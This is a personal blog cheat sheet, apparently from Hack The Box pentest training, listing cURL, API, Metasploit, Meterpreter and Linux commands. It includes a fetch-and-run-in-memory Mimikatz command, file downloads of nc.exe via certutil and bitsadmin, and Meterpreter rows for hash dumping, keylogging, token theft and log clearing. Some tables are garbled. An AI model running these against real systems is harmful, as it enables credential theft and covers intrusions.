
<!DOCTYPE html>
<html lang="en ">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Salve || 备忘录</title>
    <meta name="author" content="TiAmo">
    <meta name="description" content="Buona notte ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/avatar.png">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/full-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>

<body>

    <div id="loading"
        style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div
            style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent"
                style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#a3ddfb; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p>加载过慢请开启缓存(浏览器默认开启)</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">Salve</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled" />
            </span>
            <span>home</span>
        </a>
        
        <a href="/about">
            <span>
                <a-icon type="idcard" theme="filled" />
            </span>
            <span>about</span>
        </a>
        
        <a href="/archives">
            <span>
                <a-icon type="folder" theme="filled" />
            </span>
            <span>archives</span>
        </a>
        
        <a href="/categories">
            <span>
                <a-icon type="book" theme="filled" />
            </span>
            <span>categories</span>
        </a>
        
        <a href="/tags">
            <span>
                <a-icon type="tags" theme="filled" />
            </span>
            <span>tags</span>
        </a>
        
        <a href="">
            <span>
                <a-icon type="compass" theme="filled" />
            </span>
            <span>英文博客</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled" />
            </span>
            <span>Salve</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="idcard" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="folder" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="book" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">categories</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="tags" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">tags</div>
                </div>
            </a>
            
            <a href="">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="compass" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">英文博客</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1>备忘录 </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled" />
            </span>
            2023/6/11
        </span>

        

        

        <span class="tags">
            <span class="icon">
                <a-icon type="tags" theme="filled" />
            </span>
            
            <span class="tag">
                
                <a href="/tags/备忘录" style=color:#ffa2c4>
                    备忘录
                </a>
            </span>
            
        </span>
        
    </div>

    <div class="content" v-pre>
        <h1 id="备忘录"><a href="#备忘录" class="headerlink" title="备忘录"></a>备忘录</h1><h2 id="cURL"><a href="#cURL" class="headerlink" title="cURL"></a>cURL</h2><table>
<thead>
<tr>
<th><strong>Command</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>curl -h</code></td>
<td>cURL help menu</td>
</tr>
<tr>
<td><code>curl inlanefreight.com</code></td>
<td>Basic GET request</td>
</tr>
<tr>
<td><code>curl -s -O inlanefreight.com/index.html</code></td>
<td>Download file</td>
</tr>
<tr>
<td><code>curl -k https://inlanefreight.com</code></td>
<td>Skip HTTPS (SSL) certificate validation</td>
</tr>
<tr>
<td><code>curl inlanefreight.com -v</code></td>
<td>Print full HTTP request&#x2F;response details</td>
</tr>
<tr>
<td><code>curl -I https://www.inlanefreight.com</code></td>
<td>Send HEAD request (only prints response headers)</td>
</tr>
<tr>
<td><code>curl -i https://www.inlanefreight.com</code></td>
<td>Print response headers and response body</td>
</tr>
<tr>
<td><code>curl https://www.inlanefreight.com -A &#39;Mozilla/5.0&#39;</code></td>
<td>Set User-Agent header</td>
</tr>
<tr>
<td><code>curl -u admin:admin http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/</code></td>
<td>Set HTTP basic authorization credentials</td>
</tr>
<tr>
<td><code>curl http://admin:admin@&lt;SERVER_IP&gt;:&lt;PORT&gt;/</code></td>
<td>Pass HTTP basic authorization credentials in the URL</td>
</tr>
<tr>
<td><code>curl -H &#39;Authorization: Basic YWRtaW46YWRtaW4=&#39; http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/</code></td>
<td>Set request header</td>
</tr>
<tr>
<td><code>curl &#39;http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/search.php?search=le&#39;</code></td>
<td>Pass GET parameters</td>
</tr>
<tr>
<td><code>curl -X POST -d &#39;username=admin&amp;password=admin&#39; http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/</code></td>
<td>Send POST request with POST data</td>
</tr>
<tr>
<td><code>curl -b &#39;PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1&#39; http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/</code></td>
<td>Set request cookies</td>
</tr>
<tr>
<td><code>curl -X POST -d &#39;&#123;&quot;search&quot;:&quot;london&quot;&#125;&#39; -H &#39;Content-Type: application/json&#39; http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/search.php</code></td>
<td>Send POST request with JSON data</td>
</tr>
</tbody></table>
<span id="more"></span>

<h2 id="APIs"><a href="#APIs" class="headerlink" title="APIs"></a>APIs</h2><table>
<thead>
<tr>
<th><strong>Command</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>curl http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/api.php/city/london</code></td>
<td>Read entry</td>
</tr>
<tr>
<td>&#96;curl -s http:&#x2F;&#x2F;<SERVER_IP>:<PORT>&#x2F;api.php&#x2F;city&#x2F;</td>
<td>jq&#96;</td>
</tr>
<tr>
<td><code>curl -X POST http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/api.php/city/ -d &#39;&#123;&quot;city_name&quot;:&quot;HTB_City&quot;, &quot;country_name&quot;:&quot;HTB&quot;&#125;&#39; -H &#39;Content-Type: application/json&#39;</code></td>
<td>Create (add) entry</td>
</tr>
<tr>
<td><code>curl -X PUT http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/api.php/city/london -d &#39;&#123;&quot;city_name&quot;:&quot;New_HTB_City&quot;, &quot;country_name&quot;:&quot;HTB&quot;&#125;&#39; -H &#39;Content-Type: application/json&#39;</code></td>
<td>Update (modify) entry</td>
</tr>
<tr>
<td><code>curl -X DELETE http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/api.php/city/New_HTB_City</code></td>
<td>Delete entry</td>
</tr>
</tbody></table>
<h2 id="Browser-DevTools"><a href="#Browser-DevTools" class="headerlink" title="Browser DevTools"></a>Browser DevTools</h2><table>
<thead>
<tr>
<th><strong>Shortcut</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody><tr>
<td>[<code>CTRL+SHIFT+I</code>] or [<code>F12</code>]</td>
<td>Show devtools</td>
</tr>
<tr>
<td>[<code>CTRL+SHIFT+E</code>]</td>
<td>Show Network tab</td>
</tr>
<tr>
<td>[<code>CTRL+SHIFT+K</code>]</td>
<td></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th><code>curl http:/SERVER_IP:PORT/</code></th>
<th>cURL 获取请求</th>
</tr>
</thead>
<tbody><tr>
<td><code>curl -s http:/SERVER_IP:PORT/ -X POST</code></td>
<td>cURL 发布请求</td>
</tr>
<tr>
<td><code>curl -s http:/SERVER_IP:PORT/ -X POST -d &quot;param1=sample&quot;</code></td>
<td>包含数据的网址 POST 请求</td>
</tr>
<tr>
<td>&#96;echo hackthebox</td>
<td>base64&#96;</td>
</tr>
<tr>
<td>&#96;echo ENCODED_B64</td>
<td>base64 -d&#96;</td>
</tr>
<tr>
<td>&#96;echo hackthebox</td>
<td>xxd -p&#96;</td>
</tr>
<tr>
<td>&#96;echo ENCODED_HEX</td>
<td>xxd -p -r&#96;</td>
</tr>
<tr>
<td>&#96;echo hackthebox</td>
<td>tr ‘A-Za-z’ ‘N-ZA-Mn-za-m’&#96;</td>
</tr>
<tr>
<td>&#96;echo ENCODED_ROT13</td>
<td>tr ‘A-Za-z’ ‘N-ZA-Mn-za-m’&#96;</td>
</tr>
</tbody></table>
<h1 id="Deobfuscation-Websites"><a href="#Deobfuscation-Websites" class="headerlink" title="Deobfuscation Websites"></a>Deobfuscation Websites</h1><table>
<thead>
<tr>
<th><strong>Website</strong></th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="https://jsconsole.com/">JS Console</a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://prettier.io/playground/">Prettier</a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://beautifier.io/">Beautifier</a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="http://www.jsnice.org/">JSNice</a></td>
</tr>
</tbody></table>
<p>##文件传输</p>
<table>
<thead>
<tr>
<th><code>Invoke-WebRequest https://&lt;snip&gt;/PowerView.ps1 -OutFile PowerView.ps1</code></th>
<th>使用 PowerShell 下载文件</th>
</tr>
</thead>
<tbody><tr>
<td><code>IEX (New-Object Net.WebClient).DownloadString(&#39;https://&lt;snip&gt;/Invoke-Mimikatz.ps1&#39;)</code></td>
<td>使用 PowerShell 在内存中执行文件</td>
</tr>
<tr>
<td><code>Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64</code></td>
<td>使用 PowerShell 上传文件</td>
</tr>
<tr>
<td><code>bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe</code></td>
<td>使用 Bitsadmin 下载文件</td>
</tr>
<tr>
<td><code>certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe</code></td>
<td>使用 Certutil 下载文件</td>
</tr>
<tr>
<td><code>wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh</code></td>
<td>使用 Wget 下载文件</td>
</tr>
<tr>
<td><code>curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh</code></td>
<td>使用 cURL 下载文件</td>
</tr>
<tr>
<td><code>php -r &#39;$file = file_get_contents(&quot;https://&lt;snip&gt;/LinEnum.sh&quot;); file_put_contents(&quot;LinEnum.sh&quot;,$file);&#39;</code></td>
<td>使用 PHP 下载文件</td>
</tr>
<tr>
<td><code>scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip</code></td>
<td>使用 SCP 上传文件</td>
</tr>
<tr>
<td><code>scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe</code></td>
<td>使用 SCP 下载文件</td>
</tr>
<tr>
<td><code>Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile &quot;nc.exe&quot;</code></td>
<td>使用 Chrome 用户代理的 Invoke-WebRequest</td>
</tr>
</tbody></table>
<h3 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h3><table>
<thead>
<tr>
<th><code>show exploits</code></th>
<th>显示框架内的所有漏洞。</th>
</tr>
</thead>
<tbody><tr>
<td><code>show payloads</code></td>
<td>显示框架中的所有有效负载。</td>
</tr>
<tr>
<td><code>show auxiliary</code></td>
<td>显示框架中的所有辅助模块。</td>
</tr>
<tr>
<td><code>search &lt;name&gt;</code></td>
<td>在框架中搜索漏洞或模块。</td>
</tr>
<tr>
<td><code>info</code></td>
<td>加载有关特定漏洞利用或模块的信息。</td>
</tr>
<tr>
<td><code>use &lt;name&gt;</code></td>
<td>加载漏洞利用或模块（例如：使用 Windows&#x2F;smb&#x2F;psexec）。</td>
</tr>
<tr>
<td><code>use &lt;number&gt;</code></td>
<td>使用搜索命令后显示的索引号加载漏洞利用。</td>
</tr>
<tr>
<td><code>LHOST</code></td>
<td>目标可访问的本地主机 IP 地址，如果不在本地网络上，通常是公共 IP 地址。通常用于反向壳。</td>
</tr>
<tr>
<td><code>RHOST</code></td>
<td>远程主机或目标。set函数 设置特定值（例如，LHOST 或 RHOST）。</td>
</tr>
<tr>
<td><code>setg &lt;function&gt;</code></td>
<td>全局设置特定值（例如，LHOST 或 RHOST）。</td>
</tr>
<tr>
<td><code>show options</code></td>
<td>显示可用于模块或漏洞利用的选项。</td>
</tr>
<tr>
<td><code>show targets</code></td>
<td>显示漏洞利用支持的平台。</td>
</tr>
<tr>
<td><code>set target &lt;number&gt;</code></td>
<td>如果您知道操作系统和服务包，请指定特定的目标索引。</td>
</tr>
<tr>
<td><code>set payload &lt;payload&gt;</code></td>
<td>指定要使用的有效负载。</td>
</tr>
<tr>
<td><code>set payload &lt;number&gt;</code></td>
<td>指定要在显示有效负载命令后使用的有效负载索引号。</td>
</tr>
<tr>
<td><code>show advanced</code></td>
<td>显示高级选项。</td>
</tr>
<tr>
<td><code>set autorunscript migrate -f</code></td>
<td>漏洞利用完成后自动迁移到单独的进程。</td>
</tr>
<tr>
<td><code>check</code></td>
<td>确定目标是否容易受到攻击。</td>
</tr>
<tr>
<td><code>exploit</code></td>
<td>执行模块或利用并攻击目标。</td>
</tr>
<tr>
<td><code>exploit -j</code></td>
<td>在作业上下文中运行漏洞利用。（这将在后台运行漏洞利用。</td>
</tr>
<tr>
<td><code>exploit -z</code></td>
<td>成功利用漏洞后不要与会话交互。</td>
</tr>
<tr>
<td><code>exploit -e &lt;encoder&gt;</code></td>
<td>指定要使用的有效负载编码器（例如：exploit –e shikata_ga_nai）。</td>
</tr>
<tr>
<td><code>exploit -h</code></td>
<td>显示漏洞利用命令的帮助。</td>
</tr>
<tr>
<td><code>sessions -l</code></td>
<td>列出可用会话（在处理多个 shell 时使用）。</td>
</tr>
<tr>
<td><code>sessions -l -v</code></td>
<td>列出所有可用会话并显示详细字段，例如利用系统时使用了哪个漏洞。</td>
</tr>
<tr>
<td><code>sessions -s &lt;script&gt;</code></td>
<td>在所有 Meterpreter 实时会话上运行特定的 Meterpreter 脚本。</td>
</tr>
<tr>
<td><code>sessions -K</code></td>
<td>终止所有实时会话。</td>
</tr>
<tr>
<td><code>sessions -c &lt;cmd&gt;</code></td>
<td>在所有实时 Meterpreter 会话上执行命令。</td>
</tr>
<tr>
<td><code>sessions -u &lt;sessionID&gt;</code></td>
<td>将普通的 Win32 外壳升级到 Meterpreter 控制台。</td>
</tr>
<tr>
<td><code>db_create &lt;name&gt;</code></td>
<td>创建用于数据库驱动攻击的数据库（例如：db_create autopwn）。</td>
</tr>
<tr>
<td><code>db_connect &lt;name&gt;</code></td>
<td>创建并连接到用于驱动攻击的数据库（例如：db_connect autopwn）。</td>
</tr>
<tr>
<td><code>db_nmap</code></td>
<td>使用 Nmap 并将结果放入数据库中。（支持正常的 Nmap 语法，例如 –sT –v –P0。</td>
</tr>
<tr>
<td><code>db_destroy</code></td>
<td>删除当前数据库。</td>
</tr>
<tr>
<td><code>db_destroy &lt;user:password@host:port/database&gt;</code></td>
<td>使用高级选项删除数据库。</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</tbody></table>
<hr>
<h2 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h2><table>
<thead>
<tr>
<th><strong>命令</strong></th>
<th><strong>描述</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>help</code></td>
<td>打开 Meterpreter 使用帮助。</td>
</tr>
<tr>
<td><code>run &lt;scriptname&gt;</code></td>
<td>运行基于 Meterpreter 的脚本;有关完整列表，请查看 scripts&#x2F;meterpreter 目录。</td>
</tr>
<tr>
<td><code>sysinfo</code></td>
<td>显示有关受损目标的系统信息。</td>
</tr>
<tr>
<td><code>ls</code></td>
<td>列出目标上的文件和文件夹。</td>
</tr>
<tr>
<td><code>use priv</code></td>
<td>加载扩展的 Meterpreter 库的权限扩展。</td>
</tr>
<tr>
<td><code>ps</code></td>
<td>显示所有正在运行的进程以及与每个进程关联的帐户。</td>
</tr>
<tr>
<td><code>migrate &lt;proc. id&gt;</code></td>
<td>迁移到特定进程 ID（PID 是从 ps 命令获取的目标进程 ID）。</td>
</tr>
<tr>
<td><code>use incognito</code></td>
<td>加载隐身功能。（用于目标计算机上的令牌窃取和模拟。</td>
</tr>
<tr>
<td><code>list_tokens -u</code></td>
<td>按用户列出目标上的可用令牌。</td>
</tr>
<tr>
<td><code>list_tokens -g</code></td>
<td>按组列出目标上的可用令牌。</td>
</tr>
<tr>
<td><code>impersonate_token &lt;DOMAIN_NAMEUSERNAME&gt;</code></td>
<td>模拟目标上可用的令牌。</td>
</tr>
<tr>
<td><code>steal_token &lt;proc. id&gt;</code></td>
<td>窃取可用于给定进程的令牌并模拟该令牌。</td>
</tr>
<tr>
<td><code>drop_token</code></td>
<td>停止模拟当前令牌。</td>
</tr>
<tr>
<td><code>getsystem</code></td>
<td>尝试通过多个攻击媒介将权限提升为 SYSTEM 级访问权限。</td>
</tr>
<tr>
<td><code>shell</code></td>
<td>放入包含所有可用令牌的交互式外壳中。</td>
</tr>
<tr>
<td><code>execute -f &lt;cmd.exe&gt; -i</code></td>
<td>执行cmd.exe并与之交互。</td>
</tr>
<tr>
<td><code>execute -f &lt;cmd.exe&gt; -i -t</code></td>
<td>使用所有可用的令牌执行 cmd.exe。</td>
</tr>
<tr>
<td><code>execute -f &lt;cmd.exe&gt; -i -H -t</code></td>
<td>使用所有可用的令牌执行cmd.exe并使其成为隐藏进程。</td>
</tr>
<tr>
<td><code>rev2self</code></td>
<td>恢复为用于破坏目标的原始用户。</td>
</tr>
<tr>
<td><code>reg &lt;command&gt;</code></td>
<td>在目标注册表中进行交互、创建、删除、查询、设置等。</td>
</tr>
<tr>
<td><code>setdesktop &lt;number&gt;</code></td>
<td>根据登录者切换到其他屏幕。</td>
</tr>
<tr>
<td><code>screenshot</code></td>
<td>截取目标屏幕的屏幕截图。</td>
</tr>
<tr>
<td><code>upload &lt;filename&gt;</code></td>
<td>将文件上传到目标。</td>
</tr>
<tr>
<td><code>download &lt;filename&gt;</code></td>
<td>从目标下载文件。</td>
</tr>
<tr>
<td><code>keyscan_start</code></td>
<td>开始在远程目标上嗅探击键。</td>
</tr>
<tr>
<td><code>keyscan_dump</code></td>
<td>转储在目标上捕获的远程密钥。</td>
</tr>
<tr>
<td><code>keyscan_stop</code></td>
<td>停止在远程目标上嗅探击键。</td>
</tr>
<tr>
<td><code>getprivs</code></td>
<td>在目标上获得尽可能多的权限。</td>
</tr>
<tr>
<td><code>uictl enable &lt;keyboard/mouse&gt;</code></td>
<td>控制键盘和&#x2F;或鼠标。</td>
</tr>
<tr>
<td><code>background</code></td>
<td>在后台运行您当前的 Meterpreter shell。</td>
</tr>
<tr>
<td><code>hashdump</code></td>
<td>在目标上转储所有哈希。使用嗅探器 加载嗅探器模块。</td>
</tr>
<tr>
<td><code>sniffer_interfaces</code></td>
<td>列出目标上的可用接口。</td>
</tr>
<tr>
<td><code>sniffer_dump &lt;interfaceID&gt; pcapname</code></td>
<td>开始在远程目标上嗅探。</td>
</tr>
<tr>
<td><code>sniffer_start &lt;interfaceID&gt; packet-buffer</code></td>
<td>从特定范围的数据包缓冲区开始嗅探。</td>
</tr>
<tr>
<td><code>sniffer_stats &lt;interfaceID&gt;</code></td>
<td>从您正在嗅探的界面中获取统计信息。</td>
</tr>
<tr>
<td><code>sniffer_stop &lt;interfaceID&gt;</code></td>
<td>停止嗅探器。</td>
</tr>
<tr>
<td><code>add_user &lt;username&gt; &lt;password&gt; -h &lt;ip&gt;</code></td>
<td>在远程目标上添加用户。</td>
</tr>
<tr>
<td><code>add_group_user &lt;&quot;Domain Admins&quot;&gt; &lt;username&gt; -h &lt;ip&gt;</code></td>
<td>将用户名添加到远程目标上的域管理员组。</td>
</tr>
<tr>
<td><code>clearev</code></td>
<td>清除目标计算机上的事件日志。</td>
</tr>
<tr>
<td><code>timestomp</code></td>
<td>更改文件属性，例如创建日期（反取证度量）。</td>
</tr>
<tr>
<td><code>reboot</code></td>
<td>重新启动目标计算机。</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th><code>man &lt;tool&gt;</code></th>
<th>打开指定工具的手册页。</th>
</tr>
</thead>
<tbody><tr>
<td><code>&lt;tool&gt; -h</code></td>
<td>打印工具的帮助页。</td>
</tr>
<tr>
<td><code>apropos &lt;keyword&gt;</code></td>
<td>在手册页的描述中搜索给定关键字的实例。</td>
</tr>
<tr>
<td><code>cat</code></td>
<td>连接和打印文件。</td>
</tr>
<tr>
<td><code>whoami</code></td>
<td>显示当前用户名。</td>
</tr>
<tr>
<td><code>id</code></td>
<td>返回用户标识。</td>
</tr>
<tr>
<td><code>hostname</code></td>
<td>设置或打印当前主机系统的名称。</td>
</tr>
<tr>
<td><code>uname</code></td>
<td>打印操作系统名称。</td>
</tr>
<tr>
<td><code>pwd</code></td>
<td>返回工作目录名称。</td>
</tr>
<tr>
<td><code>ifconfig</code></td>
<td>该实用程序用于为网络接口分配或查看地址和&#x2F;或配置网络接口参数。<code>ifconfig</code></td>
</tr>
<tr>
<td><code>ip</code></td>
<td>Ip 是用于显示或操作路由、网络设备、接口和隧道的实用程序。</td>
</tr>
<tr>
<td><code>netstat</code></td>
<td>显示网络状态。</td>
</tr>
<tr>
<td><code>ss</code></td>
<td>另一个用于调查套接字的实用程序。</td>
</tr>
<tr>
<td><code>ps</code></td>
<td>显示进程状态。</td>
</tr>
<tr>
<td><code>who</code></td>
<td>显示登录者。</td>
</tr>
<tr>
<td><code>env</code></td>
<td>打印环境或设置并执行命令。</td>
</tr>
<tr>
<td><code>lsblk</code></td>
<td>列出块设备。</td>
</tr>
<tr>
<td><code>lsusb</code></td>
<td>列出 USB 设备。</td>
</tr>
<tr>
<td><code>lsof</code></td>
<td>列出打开的文件。</td>
</tr>
<tr>
<td><code>lspci</code></td>
<td>列出 PCI 设备。</td>
</tr>
<tr>
<td><code>sudo</code></td>
<td>以其他用户身份执行命令。</td>
</tr>
<tr>
<td><code>su</code></td>
<td>该实用程序通过 PAM 请求适当的用户凭证，并切换到该用户 ID（缺省用户是超级用户）。然后执行一个 shell。<code>su</code></td>
</tr>
<tr>
<td><code>useradd</code></td>
<td>创建新用户或更新默认新用户信息。</td>
</tr>
<tr>
<td><code>userdel</code></td>
<td>删除用户帐户和相关文件。</td>
</tr>
<tr>
<td><code>usermod</code></td>
<td>修改用户帐户。</td>
</tr>
<tr>
<td><code>addgroup</code></td>
<td>将组添加到系统。</td>
</tr>
<tr>
<td><code>delgroup</code></td>
<td>从系统中删除组。</td>
</tr>
<tr>
<td><code>passwd</code></td>
<td>更改用户密码。</td>
</tr>
<tr>
<td><code>dpkg</code></td>
<td>安装、删除和配置基于 Debian 的软件包。</td>
</tr>
<tr>
<td><code>apt</code></td>
<td>高级包管理命令行实用工具。</td>
</tr>
<tr>
<td><code>aptitude</code></td>
<td>的替代项。<code>apt</code></td>
</tr>
<tr>
<td><code>snap</code></td>
<td>安装、删除和配置快照包。</td>
</tr>
<tr>
<td><code>gem</code></td>
<td>Ruby 的标准包管理器。</td>
</tr>
<tr>
<td><code>pip</code></td>
<td>Python 的标准包管理器。</td>
</tr>
<tr>
<td><code>git</code></td>
<td>版本控制系统命令行实用程序。</td>
</tr>
<tr>
<td><code>systemctl</code></td>
<td>基于命令行的服务和系统控制管理器。</td>
</tr>
<tr>
<td><code>ps</code></td>
<td>打印当前进程的快照。</td>
</tr>
<tr>
<td><code>journalctl</code></td>
<td>查询系统日志。</td>
</tr>
<tr>
<td><code>kill</code></td>
<td>向进程发送信号。</td>
</tr>
<tr>
<td><code>bg</code></td>
<td>将进程置于后台。</td>
</tr>
<tr>
<td><code>jobs</code></td>
<td>列出在后台运行的所有进程。</td>
</tr>
<tr>
<td><code>fg</code></td>
<td>将进程置于前台。</td>
</tr>
<tr>
<td><code>curl</code></td>
<td>用于从服务器传输数据或将数据传输到服务器的命令行实用程序。</td>
</tr>
<tr>
<td><code>wget</code></td>
<td>另一种方法是从FTP或HTTP（s）服务器下载文件。<code>curl</code></td>
</tr>
<tr>
<td><code>python3 -m http.server</code></td>
<td>在 TCP 端口 3 上启动 Python8000 Web 服务器。</td>
</tr>
<tr>
<td><code>ls</code></td>
<td>列出目录内容。</td>
</tr>
<tr>
<td><code>cd</code></td>
<td>更改目录。</td>
</tr>
<tr>
<td><code>clear</code></td>
<td>清除终端。</td>
</tr>
<tr>
<td><code>touch</code></td>
<td>创建一个空文件。</td>
</tr>
<tr>
<td><code>mkdir</code></td>
<td>创建目录。</td>
</tr>
<tr>
<td><code>tree</code></td>
<td>以递归方式列出目录的内容。</td>
</tr>
<tr>
<td><code>mv</code></td>
<td>移动或重命名文件或目录。</td>
</tr>
<tr>
<td><code>cp</code></td>
<td>复制文件或目录。</td>
</tr>
<tr>
<td><code>nano</code></td>
<td>基于终端的文本编辑器。</td>
</tr>
<tr>
<td><code>which</code></td>
<td>返回文件或链接的路径。</td>
</tr>
<tr>
<td><code>find</code></td>
<td>在目录层次结构中搜索文件。</td>
</tr>
<tr>
<td><code>updatedb</code></td>
<td>更新系统上现有内容的区域设置数据库。</td>
</tr>
<tr>
<td><code>locate</code></td>
<td>使用区域设置数据库查找系统上的内容。</td>
</tr>
<tr>
<td><code>more</code></td>
<td>用于读取标准输出或文件的寻呼机。</td>
</tr>
<tr>
<td><code>less</code></td>
<td>具有更多功能的替代方案。<code>more</code></td>
</tr>
<tr>
<td><code>head</code></td>
<td>打印 STDOUT 的前十行或文件。</td>
</tr>
<tr>
<td><code>tail</code></td>
<td>打印 STDOUT 或文件的最后十行。</td>
</tr>
<tr>
<td><code>sort</code></td>
<td>对 STDOUT 或文件的内容进行排序。</td>
</tr>
<tr>
<td><code>grep</code></td>
<td>搜索包含给定模式的特定结果。</td>
</tr>
<tr>
<td><code>cut</code></td>
<td>从文件的每一行中删除节。</td>
</tr>
<tr>
<td><code>tr</code></td>
<td>替换某些字符。</td>
</tr>
<tr>
<td><code>column</code></td>
<td>基于命令行的实用工具，用于将其输入格式化为多个列。</td>
</tr>
<tr>
<td><code>awk</code></td>
<td>模式扫描和处理语言。</td>
</tr>
<tr>
<td><code>sed</code></td>
<td>用于筛选和转换文本的流编辑器。</td>
</tr>
<tr>
<td><code>wc</code></td>
<td>打印给定输入的换行符、单词和字节计数。</td>
</tr>
<tr>
<td><code>chmod</code></td>
<td>更改文件或目录的权限。</td>
</tr>
<tr>
<td><code>chown</code></td>
<td>更改文件或目录的所有者和组。</td>
</tr>
</tbody></table>
<h3 id="用户管理"><a href="#用户管理" class="headerlink" title="用户管理"></a>用户管理</h3><table>
<thead>
<tr>
<th><code>sudo</code></th>
<th>以其他用户身份执行命令。</th>
</tr>
</thead>
<tbody><tr>
<td><code>su</code></td>
<td>该实用程序通过 PAM 请求适当的用户凭证，并切换到该用户 ID（缺省用户是超级用户）。然后执行一个 shell。<code>su</code></td>
</tr>
<tr>
<td><code>useradd</code></td>
<td>创建新用户或更新默认新用户信息。</td>
</tr>
<tr>
<td><code>userdel</code></td>
<td>删除用户帐户和相关文件。</td>
</tr>
<tr>
<td><code>usermod</code></td>
<td>修改用户帐户。</td>
</tr>
<tr>
<td><code>addgroup</code></td>
<td>将组添加到系统。</td>
</tr>
<tr>
<td><code>delgroup</code></td>
<td>从系统中删除组。</td>
</tr>
<tr>
<td><code>passwd</code></td>
<td>更改用户密码。</td>
</tr>
</tbody></table>
<p>###包管理</p>
<table>
<thead>
<tr>
<th><code>dpkg</code></th>
<th>这是一个安装、构建、删除和管理 Debian 软件包的工具。主要和更用户友好的前端是能力。<code>dpkg``dpkg</code></th>
</tr>
</thead>
<tbody><tr>
<td><code>apt</code></td>
<td>Apt 为包管理系统提供了一个高级命令行界面。</td>
</tr>
<tr>
<td><code>aptitude</code></td>
<td>Aptitude 是 apt 的替代方法，是包管理器的高级接口。</td>
</tr>
<tr>
<td><code>snap</code></td>
<td>安装、配置、刷新和删除快照包。Snaps 支持安全分发适用于云、服务器、桌面和物联网的最新应用程序和实用程序。</td>
</tr>
<tr>
<td><code>gem</code></td>
